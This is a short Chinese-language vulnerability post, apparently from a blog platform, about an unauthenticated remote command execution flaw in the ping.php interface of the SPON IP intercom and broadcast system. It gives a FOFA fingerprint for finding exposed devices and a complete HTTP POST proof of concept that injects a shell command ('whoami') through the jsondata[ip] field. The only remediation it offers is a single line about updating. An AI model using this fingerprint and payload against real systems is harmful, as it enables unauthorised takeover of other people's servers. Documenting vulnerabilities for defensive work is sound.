世邦 IP网络对讲广播系统 ping.php接口存在远程命令执行漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统ping.php接口存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行高危命令获取服务器权限。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc:

python 复制代码
POST /php/ping.php HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

jsondata%5Btype%5D=123&jsondata%5Bip%5D=whoami

执行whoami命令

修复建议

联系软件厂商更新至最新安全版本

相关推荐
运维行者_8 小时前
企业无线网络监控的挑战与智能化演进趋势
大数据·运维·服务器·网络·数据库
国强_dev8 小时前
技术探讨:使用 stunnel 加密转发数据库连接时,如何获取客户端真实 IP?
数据库·网络协议·tcp/ip
Coder_Shenshen9 小时前
西门子S7CommPlus协议鉴权算法原理与流程详解
网络·后端·算法
HavenlonLabs12 小时前
Havenlon 对抗性完整(十七):安全不是“防住攻击”,而是控制失败方式
网络·人工智能·架构·安全威胁分析·安全架构·havenlon
四月天4312 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
fei_sun13 小时前
路径MTU发现
linux·运维·网络
AC赳赳老秦13 小时前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
2502_9212860714 小时前
【企业网络管理】DHCP 与 SAMBA:从协议原理到企业级实战配置全解析
开发语言·php
tachibana215 小时前
hot100 回文链表(234)
java·网络·数据结构·leetcode·链表